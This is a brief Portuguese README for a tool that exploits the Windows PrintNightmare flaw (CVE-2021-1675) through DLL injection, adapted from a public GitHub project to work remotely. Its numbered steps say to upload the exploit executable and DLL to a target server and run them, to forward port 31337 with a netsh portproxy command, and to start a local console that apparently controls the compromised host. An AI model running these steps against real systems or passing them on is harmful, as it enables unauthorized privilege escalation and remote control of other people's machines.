
Exploração de escalonamento remoto de privilégios para CVE-2021-1675 (PrintNightmare) com injeção de DLL e suporte a encaminhamento de porta para execução remota.
Modificado de https://github.com/sailay1996/PrintNightmare-LPE, suporta chamada remota.
1、Faça upload do PrintNightmareLPE.exe e vlib.dll para o servidor remoto e execute PrintNightmareLPE.exe.
2、Configure o encaminhamento de porta localmente netsh interface portproxy add v4tov4 listenport=31337 connectaddress=192.168.84.129 connectport=31337
3、Inicie xconsole.exe localmente